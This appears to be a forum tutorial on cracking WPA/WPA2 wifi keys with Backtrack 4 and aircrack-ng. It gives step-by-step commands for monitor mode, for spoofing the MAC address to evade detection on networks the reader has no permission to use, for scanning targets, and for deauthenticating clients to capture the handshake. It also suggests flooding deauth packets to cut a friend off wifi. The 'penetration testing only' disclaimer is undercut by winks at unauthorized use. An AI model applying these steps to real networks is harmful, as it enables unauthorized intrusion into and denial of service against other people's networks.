Tutorial - Cracking WPA/WPA2 - Any OS - Tools included

Hello, and welcome to my friendly guide! This is the first time i have made a tutorial and i aim to make it a good one.

**This guide is intended for the sole purpose of penetration testing only**

First of all here is what you need. I will cover all of these in more detail later.

You need:
-A wireless adapter with the RTL8187 chipset
-To be able to run Backtrack 4
-A good wordlist
-Access to a WPA/WPA2 Network
-Network Traffic (People connected to the network)
-A weak wireless key

Having the correct chipset
You need to have a RTL8187 chipset for the method that i am going to show for it to work. The easiest method of doing this is buying an ALFA AWUS036H Wireless adapter; these are very popular amung the hacker community as they have excellent range and they have the all important RTL8187 chipset, that allows it to work with the aircrack-ng suite. They cost around £30 so if you are not prepared to get one stop reading now.

However if you are then here is a link to the manufacturers website: Alfa

And here is a link to amazon [UK]: Alfa on Amazon UK

This adapter is compatible with all OS =]
Once you have your shiny new adapter, install the driver and have a play about!

If you don't want to get an Alfa you can look here, to try to find another compatible card.

Running Backtrack 4
Backtrack 4 is a Linux distro that specialises in penetration testing, not only is it good for wireless hacking it has a large collection of tools for all sorts of activities. There are three easy ways to run this OS.

Bootable USB drive
This method is probably the easiest and quickest method however it does mean sacrificing a 4GB USB stick! This is great if you have one lying about if not you will need to buy one or use the other method.

Ok first you need to install LiLi USB Creator; this allows you to burn .iso images onto your memory stick. The program allows you to select download and install many different Linux distros but what we are interested in is Backtrack 4 [That i will now refer to as BT4]

Here is the download link: LiLi Live USB
Once downloaded install the program and run it. I would create screen shots and a walk through of how to create the stick, but it would take a long time, and if you are unable to figure it out you shouldn't be here.

Creating a live CD
First you must download the BT4 .iso image [Or the Backtrack 4 R1 .iso; However this tutorial will be using BT4]

You can download it from here: Backtrack

Because i have never done this myself i will just give you this link [ulr=http://www.google.co.uk/#sclient=psy&hl=en&safe=off&q=how+to+burn+.iso+&aq=f&aqi=g4g-o1&aql=&oq=&gs_rfai=&pbx=1&fp=818a8bd2053ae4a6] .iso on a DVD[/URL] the rest is up to you.

Booting BT4
Once you have created your bootable device you need to boot into BT4, this is simply done by turning on your computer with your device inserted and pressing F[something - depends on your computer] to access the boot menu. Once you have done this select your USB stick your your CD and hit enter.

Once in BT4 you may need to login; to do this use the username "root" and the password "toor". To load the GUI [Desktop] you need to type the command "startx". Now is also a convenient time to type the following command "/etc/init.d/wicd start" this starts the inbuilt wireless manager.

Now that you are in BT4 the fun can commence! Oh wait, you may need to install the drivers for the AWUS036H Wireless adapter into BT4... [Just forgot about that step - figure it out yourself!]

Plug you adapter in and lets get going!

You will also need a good wordlist, i tried to upload one for you but my computer had a sapz attakc so i am going to let you find one for yourelf ;0

Safety First!!!
If you are practicing on a network that you do not have permission to test on [I don't know why you would ;)] Then it may be a good idea to spoof your mac address. This is like an IP address for your computer.

First you need to determine your devices names and modes. This is easily done by opening Konsole and using the following command

Code:

airmon-ng

You should see something like this

Here we can see all of my wireless devices and their chipsets. The first one is my AWUS036H, The second one is my inbuilt wireless card. [You can tell by the RTL8187 chipset]

We now need to put it into monitor mode; we do this by using the following command. Where i put <interface> you need to put the name given to your RTL8187. As you can see mine is "wlan0"

Code:

airmon-ng start <interface>

As you can see "monitor mode has been enabled on mon0" from now on the interface that you should use is "mon0"

Now moving on to hiding your ass

Code:

ifconfig mon0 down
macchanger -s mon0
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

You should see something like this. Your mac address will be different to mine of course.

Viewing available networks
Now we are ready to search for networks to target; type the following command to scan for networks

Code:

airodump-ng --encrypt WPA -a mon0

here we dump the wireless networks around us with the airodump-ng command, the switch "-a" searches only for networks that have people connected to them, which is what we want, --encrypt WPA Shows only WPA networks and mon0 defines what interface to use.

In this example "BTHomeHub2-NM6K" is my home hub that i am trying to obtain the network key for. As you can see there is one client connected to it (DE:03:74:C7:33:8E)

Target acquisition
Once we have a WPA/WPA2 network that has someone connected to it. We need to 'lock on'. To do this we run:

Code:

--bssid <bssid of the access point you wish to target>

You will also need to filter the list by the channel to do this add

Code:

-c <channel>

You also critically need to add

Code:

-w <filename>

This saves the handshake to your desktop

All of that together looks like this for my example:

Code:

airodump-ng --bssid 00:23:4E:55:B3:84 -c 1 -w WPA mon0

And this is what it should look like:

As you can see there are 3 Clients connected. We now need to kick one off!

Obtaining the WPA hand shake
This is the most important part of the process, as it is the only thing that involves the users of the network. What we are trying to do is disconnect a client from the access point and then wait for them to reconnect. When they do this they have what is called a 4 way handshake; what we are trying to do is witness the handshake so that we can crack it and obtain the network key.

We do this by using aireplay-ng to kick the user offline and then wait for them reconnect. By doing this we can capture and analyse the handshake. Use the following command:

Code:

aireplay-ng --deauth 10 -a <bssid of access poin> -c <mac address of client> <interface>

In my example the bssid of my access point is 00:23:4E:55:B3:84 and the client i want to kick of is DE:03:74:C7:33:8E

--deauth means "deauthenticate" [kick off] the number after it defines how many times to do this, i set it at 10, but you only really need one. Also if you are feeling mischievous you can set it to something like 10Billion to deny someone wifi access! Not the most effective but still lol worthy. Wait till you mate has a 24 kill streak on MW2 and kick him....

So i will open a new window and leave airodump-ng running and in the new window type

Code:

aireplay-ng --deauth 10 -a 00:23:4E:55:B3:84 -c DE:03:74:C7:33:8E mon0

It will look like this:

If it is successful the airodump windows will be displaying the wpa handshake in the top right of the screen. You can see this in the image below.

If not successful, wait for a while, as what we are waiting for is the client to reconnect. If they do not reconnect then try kicking a different client.

Cracking
I have made another in depth thread about cracking the WPA handshake, it was originally going to be here but it ended up too long! You can view the next part here

Thanks for reading

Middle